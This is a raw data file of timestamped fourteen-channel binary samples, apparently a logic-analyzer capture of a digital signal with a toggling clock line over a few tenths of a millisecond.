1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5800760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5801000e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5801240e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5801520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5801760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5802040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5802280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5802520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5802760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5803000e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5803240e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5803520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5803760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5804040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5804280e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5804520e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5804760e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5805000e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5805240e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5805560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5805800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5806040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5806320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5806560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5806840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5807080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5807320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5807560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5807800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5808040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5808320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5808560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5808840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5809080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5809320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5809560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5809800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5810040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5810320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5810560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5810840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5811080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5811320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5811560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5811800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5812040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5812320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5812560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5812840e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5813080e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5813320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5813560e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5813800e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5814040e-03 1,0,0,0,1,0,0,0,0,0,0,0,0,0,8.5814320e-03 1,0,0,0,1,0,0,0,0,0,0,0,1,0,8.5814560e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,0,8.5814840e-03 1,0,0,0,1,1,0,0,0,1,0,0,0,1,8.7060000e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,8.7061920e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,8.7062120e-03 0,1,0,0,1,1,0,0,0,1,0,1,0,1,8.7062440e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,8.7062680e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,1,8.7066240e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,8.7066520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,8.7066560e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,1,8.7066760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,8.7067000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,1,8.7067240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,8.7067480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,1,8.7067720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,1,8.7068000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,1,8.7068240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7068360e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7068480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7068760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7069000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7069240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7069480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7069720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7070000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7070240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7070520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7070760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7071000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7071040e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7071480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7071720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7071800e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7072000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7072240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7072520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7072760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7073000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7073240e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,8.7073280e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7073320e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7073760e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7074000e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,8.7074040e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7074080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7074240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7074520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7074760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7075000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7075240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7075480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7075720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7076000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7076240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7076520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7076760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7077000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7077040e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7077480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7077720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7077800e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7078000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7078240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7078520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7078760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7079000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7079240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7079480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7079720e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7079800e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7080240e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7080520e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,8.7080560e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7080600e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7080760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7081000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7081240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7081480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7081560e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7082000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7082240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7082320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7082520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7082760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7083000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7083240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7083480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7083720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7084000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7084240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7084520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7084760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7085000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7085240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7085480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7085720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7086000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7086240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7086520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7086760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7087000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7087240e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,8.7087280e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7087320e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7087760e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7088000e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,8.7088040e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7088080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7088240e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7088520e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7089000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7089240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7089320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7089480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7089720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7090000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7090240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7090520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7090760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7091000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7091240e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,8.7091280e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7091320e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7091720e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7092000e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,8.7092040e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7092080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7092240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7092520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7092760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7093000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7093240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7093480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7093720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7094000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7094240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7094520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7094760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7095000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7095240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7095480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7095720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7096000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7096240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7096520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7096760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7097000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7097240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7097480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7097560e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7098000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7098240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7098320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7098520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7098760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7099000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7099240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7099480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7099720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7100000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7100240e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7100280e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7100480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7100760e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7101000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7101240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7101320e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7101720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7102000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7102520e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7102760e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7103000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7103240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7103480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7103720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7104000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7104240e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7104280e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7104760e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7105000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7105080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7105240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7105480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7105720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7106000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7106240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7106520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7106760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7107000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7107240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7107480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7107720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7108000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7108200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7108520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7108760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7108960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7109240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7109480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7109720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7109960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7110200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7110440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7110760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7110960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7111240e-03 0,1,0,0,1,0,0,0,0,1,0,0,0,0,8.7111480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7111520e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7111720e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7111960e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7112200e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7112440e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7112520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7113000e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7113240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7113720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7113960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7114200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7114440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7114720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7114960e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7115000e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7115480e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7115720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7115800e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7115960e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7116200e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7116440e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7116720e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7116960e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7117240e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7117480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7117720e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7117760e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,8.7118200e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7118480e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7118520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7118720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7118960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7119240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7119480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7119720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7119960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7120200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7120440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7120720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7120960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7121240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7121480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7121720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7121960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7122200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7122440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7122720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7122960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7123240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7123480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7123720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7123960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7124200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7124440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7124720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7124960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7125240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7125480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7125720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7125960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7126200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7126440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7126720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7126960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7127240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7127480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7127720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7127960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7128200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7128440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7128720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7128960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7129240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7129480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7129720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7129960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7130200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7130440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7130720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7130960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7131240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7131480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7131720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7131960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7132200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7132440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7132720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7133000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7133240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7133480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,8.7133720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,8.7134000e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,8.7134040e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,8.8379040e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,8.8380760e-03 1,1,0,0,1,1,0,0,0,1,0,1,0,1,8.8381000e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,8.8381240e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,1,8.8384440e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,8.8384680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,8.8384760e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,8.8384920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,8.8385160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,8.8385400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,8.8385680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,8.8385920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,8.8386200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,8.8386440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,8.8386680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8386720e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8386920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8387160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8387400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8387640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8387920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8388200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8388440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8388680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8388920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8389160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8389240e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8389680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8389920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8390000e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8390200e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8390440e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8390680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8390920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8391160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8391400e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8391480e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8391920e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8392200e-03 1,1,0,0,1,1,0,0,0,0,0,0,0,0,8.8392240e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8392280e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8392440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8392680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8392920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8393160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8393400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8393640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8393920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8394200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8394680e-03 